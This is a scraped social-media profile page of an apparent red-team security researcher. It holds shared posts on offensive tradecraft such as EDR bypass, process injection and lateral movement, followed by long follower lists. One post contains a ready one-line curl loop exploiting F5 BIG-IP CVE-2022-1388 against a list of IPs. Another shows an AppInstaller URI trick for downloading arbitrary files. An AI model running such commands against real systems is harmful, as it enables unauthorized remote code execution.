Lynn Enayeh @m3m0ryAll0c
#RedTeam @ Mandiant | ☕️👩🏽💻🚴🏽♀️🏋🏽♀️✈️. Washington, DC Joined May 2017-
Tweets120
-
Followers271
-
Following145
-
Likes1K
As "offensive operators" we often have way more data than is typically presented. It's time to do better than lazy screenshots of a Bloodhound UI with a messy blob. Given transitive object control: give info on last hop, chain length, and type. IN FULL! tinyurl.com/44y4up7k
A small blogpost (and PoC) about creating Windows processes using syscalls 😊 coresecurity.com/core-labs/arti…
Lateral movement with Outlook + WMI COM objects
[BLOG] Short post on how to use Firefox to access internal web apps over SOCKS using NTLM authentication. offensivedefence.co.uk/posts/ntlm-aut…
Here is my variant of Gargoyle for x64 to evade memory scanners. Fully relies on ROP and PIC without any APC. Huge thanks to @waldoirc for the documentation. github.com/thefLink/DeepS…
[BLOG POST] Finally managed to write down a post about FunctionHijacking, a "new" process injection technique built upon Module/Function Stomping, along with my experiments to break behavioral based detection of other common process injection techniques. klezvirus.github.io/RedTeaming/AV_…
The first blog post is here. This one covers the technical details of CVE-2022-26923 (Active Directory Domain Services Elevation of Privilege Vulnerability). The vulnerability was patched as part of the May 2022 Security Updates from Microsoft. research.ifcr.dk/9e098fe298f4
Exploit F5 Big IP Using Curl CVE-2022-1388 cat ips.txt | while read ip; do curl -su admin -H "Content-Type: application/json" http://$ip/mgmt/tm/util/bash -d '{"command":"run","utilCmdArgs":"-c id"}';done did i miss something ? #bugbountytip #bugbonty #infosec
Operation Non-Infosec Reading Material
New from @jsecurity101: MSRPC to ATT&CK is an encyclopedia of comprehensive context about specific Remote Procedure Call protocols. redcanary.com/blog/msrpc-to-…
PE/COFF import parser (github.com/EspressoCake/D…) + DLL search order hijacking BOF 👏🏽👏🏽
PE/COFF import parser (github.com/EspressoCake/D…) + DLL search order hijacking BOF 👏🏽👏🏽
So now we are in 2021 and everyone is using LAPS (cough cough), it is time for CrackMapExec to level up the game. I've added a new core function "--laps", so if you have compromised an account that can read LAPS pass, you can conquer the world now 🔥 Pushed on @porchetta_ind 🪂
As some of you may know, #CobaltStrike beacons can be detected using ETW. For CCDC our team built and used BeaconHunter to detect and respond to these threats. Github: github.com/3lp4tr0n/Beaco… We were able to kill +210 beacons (~70% automated) and monitor their behavior like...
A tale of EDR bypass methods - s3cur3th1ssh1t.github.io/A-tale-of-EDR-… Special thanks to @_EthicalChaos_ and @_RastaMouse for answering all my questions! 🍻
We've summarized 4 primary techniques we've seen #UNC2452 and other TAs use while moving laterally to the M365 cloud. Technical details, detect, prevent, and recovery advice: fireeye.com/blog/threat-re… shouts to co-authors Matthew McWhirt, Nick Bennet, and @mburns7
1⃣ Search SolarWinds server for SolarWinds.Orion.Core.BusinessLayer.dll (may be multiple) 2⃣ Copy any/all to a temp folder 3⃣ Scan with Yara rules (Or just scan the whole server..) 4⃣ If a match, review the blog post and move to IR Take this threat very seriously. #SUNBURST 🎆
1⃣ Search SolarWinds server for SolarWinds.Orion.Core.BusinessLayer.dll (may be multiple) 2⃣ Copy any/all to a temp folder 3⃣ Scan with Yara rules (Or just scan the whole server..) 4⃣ If a match, review the blog post and move to IR Take this threat very seriously. #SUNBURST 🎆
I found a way to download arbitrary files with AppInstaller.exe (signed by MS). start ms-appinstaller://?source=<url> `start` calls the default URI handler, spawns AppInstaller.exe, and downloads an arbitrary file which you can find using forfiles. #lolbin #lolbas #appinstaller
Our lab rats have been busy! 🔥🐀 In our latest post, @Jean_Maes_1994 explains how D/Invoke can be used to bypass hooking. Shoutout to @cobbr_io for the Sharpsploit project, @FuzzySec and @TheRealWover for their work on D/Invoke blog.nviso.eu/2020/11/20/dyn…
sinusoid @the_bit_diddler
2K Followers 2K Following
Nick Carr @ItsReallyNick
38K Followers 3K Following Tech Director / Threat Intelligence at Microsoft. Previously, Director of Incident Response & Intel Research at Mandiant. Former Chief Technical Analyst at CISA
Ryan Tomcik @heferyzan
1K Followers 2K Following DE/TH @GoogleCloud @Mandiant Threat Defense | Google in the streets, Mandiant in the tweets | Thruntito ergo sum | Bsky: https://t.co/THP7ny8CgD
Gigs @ Shmoo @Gigs_Security
2K Followers 726 Following not aspiring to be humble▪️ #AdvancedPractices🦅 ▪️Thoughts are my own ▪️She|Her|Gigs
Van @Wanna_VanTa
4K Followers 392 Following Research & Discovery Lead @Mandiant @googlecloud Specialties: researching adversary tradecraft, hardstuck masters TFT, and losing sneaker raffles.
Josh Madeley @MadeleyJosh
1K Followers 383 Following a begrudgingly polite Canadian ex-pat living in Boston, finding evil at @Mandiant
Fletcher Davis @gymR4T
898 Followers 831 Following Director of Research @BeyondTrust | Former Red Team @CrowdStrike @Mandiant
WallisMargaret @d2E1J0y9nzrxZi
3 Followers 972 Following
Anabella @Iemercu7672674
31 Followers 2K Following The question isn’t who’s going to let me; it’s who’s going to stop me.
Crorpui @Crorpui3344785
8 Followers 631 Following
Alanna Hagenes @AHagenes79888
63 Followers 3K Following
Securityblog @Securityblog
12K Followers 14K Following There are 10 types of people in the world. Those who understand binary, and those who don't. All opinions and views are my own. #BsidesDub organizer
Neygheh @NeyghehTW7I
31 Followers 833 Following
Amanie اماني @AmanieAntar
40 Followers 544 Following Took me eons to get here, it’ll take me longer to write a pithy bio.
Sp3cul8r @sp3cul8rl
500 Followers 1K Following Trading since 96. Top 20 USIC in 2023. Trading community in link ⬇️Focus on managing losing trades first. Then, maximize wins. Unique adaptive style.
Kate @v1N2Z0gdZU4cDUR
91 Followers 7K Following
Carlos Mayorga @Sud0Chul0
600 Followers 6K Following System Administrator | Fortinet | Azure | Entra | #cybersecurity
TammyPitman @2ld9CwWd4Y1Rmw
26 Followers 2K Following
Jen @g4a419Uy9QvS4
69 Followers 7K Following
Microsoft EMS @microsoftems
34 Followers 331 Following
Soumyani1 @reveng007
1K Followers 2K Following Content absorber | CRTO | CRTP | @BlackHatEvents Asia, USA, SecTor, Europe 2024 Arsenal and @WWHackinFest 2024 Presenter
S4ntiagoP @s4ntiago_p
3K Followers 854 Following Infosecing at @MDSecLabs, ex @CoreSecurity CVEs: -1
Bella @Bella1221663
4 Followers 268 Following
LyricLoom @lyric83850
5 Followers 269 Following
_s_olstice @olstice95715
8 Followers 268 Following
Wendath @Wendath124900
4 Followers 295 Following
Catherine @BeeCatheirne
360 Followers 4K Following news reporter, Security Researcher || Finding Bugs in Smart Contracts 🔍🖇️Tesla investor Ghost writer and other Robotics https://t.co/7OPh53j03a
zOmfg0rz @_Omfg0rz
310 Followers 3K Following
waldoirc @waldoirc
3K Followers 626 Following Trying to figure out how computers work. Figuring out SDR, IOT, and Mobile exploitation. https://t.co/rLZFU0dOBy
Frank Wiersma @frankwiersma_
212 Followers 4K Following Ethical Hacker | Cyber Security Professional | OSCP | Experimenting with VR ᯅ, LLM, GenAI
Bl4ckM1rror @Bl4ckM1rror
31 Followers 333 Following Sometimes friend of ntdll, only when is unhooked | Red Team Operator | Malware Developer | Windows Infernals
Akoibon @Akoibon2
19 Followers 331 Following
Pedro Tequila @teqagogo
2 Followers 263 Following
Ph4nt0m @Ph4nt0mm
237 Followers 678 Following newbie pwner and Interest pwn/rev, Fuzzing and I am OT/ICS Researcher
John Scarbrough @JohnFScarbrough
19 Followers 88 Following Incident Response @mandiant. Opinions my own.
Matthew @embee_research
14K Followers 2K Following Security Researcher, Creating and Sharing Educational Content.
Victor @vicxor_
32 Followers 248 Following
Mitch Clarke @snozberries_au
370 Followers 303 Following Mandiant incident response lead, United Kingdom and Ireland
AdamWawrow @AdamWawrow
214 Followers 1K Following
darkside @HackDarkside
3 Followers 182 Following Red Team , Cyber Security Hacking and Penteration Testing Tools for your Security Arsenal!
Mudassir Hashmi @mhash_hashmi
37 Followers 518 Following Cyber Security Leader, Husband, Father, Sports Fan (Go Buffalo Bills!), with interest in #ThreatIntel #ThreatResearch #Hunting #IR #Detection #SOC #AI #InfoSec
root@iyn @rootiyn1
35 Followers 520 Following
G.N. @shirotw
70 Followers 377 Following Appear weak when you are strong, and strong when you are weak.
𝙳𝚛𝚊𝚔𝚎 @portslug
284 Followers 1K Following 🤹♂️Entrepreneur 🧙♂️ Cybersecurity Consultant 🎯 Adversary Emulation 🗝️ Locksport Enthusiast 🐙𝗣𝗼𝘀𝘁𝘀 𝗮𝗿𝗲 𝗺𝘆 𝗼𝘄𝗻! 🇺🇸🍍🍕
David Cartier @chessyman973
118 Followers 1K Following
Adam Chester 🏴�... @_xpn_
36K Followers 501 Following Hacker for Hire at @SpecterOps | Blog at https://t.co/tjfTOllCEu | Insta at https://t.co/PqR6CZPwjl
sinusoid @the_bit_diddler
2K Followers 2K Following
Nick Carr @ItsReallyNick
38K Followers 3K Following Tech Director / Threat Intelligence at Microsoft. Previously, Director of Incident Response & Intel Research at Mandiant. Former Chief Technical Analyst at CISA
Stephen Sims @Steph3nSims
24K Followers 834 Following Perpetual Student | SANS Fellow | Musician | Braggart Hater | Gray Hat Hacking | VR | 🏂 | deadcode | https://t.co/CadJehomsU
Samir @SBousseaden
25K Followers 1K Following Detection Engineering | Elastic Security Mastodon: @[email protected]
Ryan Tomcik @heferyzan
1K Followers 2K Following DE/TH @GoogleCloud @Mandiant Threat Defense | Google in the streets, Mandiant in the tweets | Thruntito ergo sum | Bsky: https://t.co/THP7ny8CgD
x86matthew @x86matthew
21K Followers 189 Following C / asm / system emulation / reverse engineering. @the_secret_club
Gigs @ Shmoo @Gigs_Security
2K Followers 726 Following not aspiring to be humble▪️ #AdvancedPractices🦅 ▪️Thoughts are my own ▪️She|Her|Gigs
chompie @chompie1337
83K Followers 1K Following hacker, weird machine mechanic, X-Force Offensive Research (XOR)
SwiftOnSecurity @SwiftOnSecurity
405K Followers 9K Following computer security person. former helpdesk.
Van @Wanna_VanTa
4K Followers 392 Following Research & Discovery Lead @Mandiant @googlecloud Specialties: researching adversary tradecraft, hardstuck masters TFT, and losing sneaker raffles.
Pavel Yosifovich @zodiacon
14K Followers 917 Following Windows Internals expert, author, and trainer. Teaching system programming & debugging at TrainSec. Check out my books & courses! 🚀 #WindowsInternals #TrainSec
Chetan Nayak (Brute R... @NinjaParanoid
31K Followers 0 Following Founder Dark Vortex/Brute Ratel | Former RedTeam @CrowdStrike @Mandiant @niiconsulting
Josh Madeley @MadeleyJosh
1K Followers 383 Following a begrudgingly polite Canadian ex-pat living in Boston, finding evil at @Mandiant
Marcello @byt3bl33d3r
30K Followers 561 Following CyBeRsEcUrItY | Not afraid to put down with some THICC malware on disk | securing and breaking AI @PaloAltoNtwks | Ex @spacex
Devon Kerr @_devonkerr_
8K Followers 724 Following Director of Threat Research and @ElasticSecLabs team lead; custodian of secret histories. Posts are my own.
Dirk-jan @_dirkjan
29K Followers 206 Following Hacker at @OutsiderSec. Researches AD and Azure (AD) security. Likes to play around with Python and write tools that make work easier.
LaurieWired @lauriewired
106K Followers 285 Following researcher @google; serial complexity unpacker; https://t.co/Vl1seeNgYK ex @ msft & aerospace
Fairfax County Police @FairfaxCountyPD
289K Followers 266 Following Official Fairfax County Police Dept. Report crimes: call/text 911 for emergencies, 703-691-2131 for non-emergencies. RTs not endorsements. Not monitored 24/7.
Parnian @Parnian_7
583 Followers 381 Following Frontline Intrusion Operations Lead|Manager @Mandiant @Google #AdvancedPractices 🦅 #infosec. Ideas my own.
Nick Powers @zyn3rgy
2K Followers 228 Following Adversary Simulation @SpecterOps | Previously @Rapid7 & @Protiviti
S4ntiagoP @s4ntiago_p
3K Followers 854 Following Infosecing at @MDSecLabs, ex @CoreSecurity CVEs: -1
Arlington Now @ARLnowDOTcom
60K Followers 526 Following News, views and things to do in Arlington and Falls Church, Virginia. Neighbor to @alexandrianow and @ffxnow
WTOP @WTOP
306K Followers 1K Following The official X account of WTOP News. News Happens Here. Live 24/7/365.
John Scarbrough @JohnFScarbrough
19 Followers 88 Following Incident Response @mandiant. Opinions my own.
Matthew @embee_research
14K Followers 2K Following Security Researcher, Creating and Sharing Educational Content.
Mitch Clarke @snozberries_au
370 Followers 303 Following Mandiant incident response lead, United Kingdom and Ireland
AdamWawrow @AdamWawrow
214 Followers 1K Following
thefLink @thefLinkk
1K Followers 150 Following
Hope Walker @Icemoonhsv
1K Followers 166 Following Senior Security Researcher at @SpecterOps. All opinions are my own.
Greg Darwin @gregdarwin
2K Followers 0 Following No longer using Twitter. Gone looking for blue skies.
Sam Sabetan @samsabetan
90 Followers 75 Following
Alvaro Muñoz @pwntester
13K Followers 514 Following Security Researcher with @XBOW. CTF #int3pids. Opinions here are mine! bluesky: https://t.co/9HRRzpBECt
Matthew Conway @svcghost
1K Followers 1K Following I'm a little bit boy scout, a little bit cowboy | Security @HashiCorp | @srcmtd newsletter | CTI, C2 infrastructure, macOS, OSINT, русский
Oddvar Moe @Oddvarmoe
19K Followers 1K Following Red Teamer @TrustedSec | MS MVP | Speaker | Security Researcher | Blogger | Total n00b & always learning | UNC1194 | Tinkerer | Gamer I try to inspire!
Charlie Bromberg « ... @_nwodtuhs
15K Followers 652 Following Trying to hack the way we hack things 🏴☠️
Rémi GASCOU (Podalir... @podalirius_
8K Followers 663 Following Security Researcher & Speaker | Microsoft Security MVP | Developer of security tools 🎬 https://t.co/QaAENc4NcY
inf0secRabbit @Inf0secRabbit
873 Followers 296 Following Threat research @Crowdstrike | Ex-Red Team @Mandiant | Profession is passion :) | Tweets are all mine
Bennett Tomlinson @apokryptein
33 Followers 697 Following
Joe Vest @joevest
8K Followers 892 Following Red Teamer丨Author of Red Team Development and Operations https://t.co/LTiTgnFKJq 丨Don't let perfect be the enemy of good
hasherezade @hasherezade
89K Followers 910 Following Programmer, #malware analyst. Author of #PEbear, #PEsieve, #TinyTracer. Private account. All opinions expressed here are mine only (not of my employer etc)
Dave Cossa @G0ldenGunSec
2K Followers 262 Following Adversary Simulation @xforce/ Frequent reader of the first page of Google results / Occasional reader of the second page of Google results
waldoirc @waldoirc
3K Followers 626 Following Trying to figure out how computers work. Figuring out SDR, IOT, and Mobile exploitation. https://t.co/rLZFU0dOBy
Jake Valletta @jake_valletta
343 Followers 74 Following Mechkbs, mobile/embedded security, craft beer
Alex Teixeira @ateixei
3K Followers 961 Following I design and build #SIEM content for a living. Editor at https://t.co/WIrKw7X1p5 #DetectionEngineering & Research, #ML #Stats x-Splunk
Steve YARA Synapse Mi... @stvemillertime
17K Followers 1K Following threat intelligence @google writing & sharing on adversary tradecraft, malware, threat detection, AI-nexus intel and all things #yara
J⩜⃝mie Williams @jamieantisocial
10K Followers 7K Following threats && stuff || #UNC1799 forever 🤘|| @DistrictHeather ♥️ + 🍷 **𝚅𝚒𝚎𝚠𝚜 𝚎𝚡𝚙𝚛𝚎𝚜𝚜𝚎𝚍 𝚊𝚛𝚎 𝚖𝚈 օ𝚠𝚗**
Jo@Qu!N @Salcedopolis
438 Followers 4K Following InfoSec| Sales|”Everything in moderation, including moderation" O.W. | Currently @TeamCymru| Former @Authentic8 @Polarityio 🇧🇴🇺🇸🇭🇹🇬🇹
Jayce Nichols @JayceNichols_
910 Followers 632 Following @Mandiant Intel, now @Google. Intel analyst at heart. ML tinkerer. Micah 6:8 aspirant. Random other things. Opinions my own.
Brice @theonehiding
338 Followers 329 Following Semi-professional critic of everything. Generally interested in infosec and cryptography. Mastodon: @[email protected]
Roxana @RoxanaKovaci
645 Followers 383 Following Red Team @Nettitude_Labs | Former Red Team + Incident Response @Mandiant @GoogleCloud
queen basic ⊛ @onfvp
5K Followers 911 Following How many buzzwords can I fit here? 🐱 Cat Lady • #DFIR-er • Thrunter • Candy Aficionado • Gamer • Coffee Addict • ReaderTrends for United States
You might like
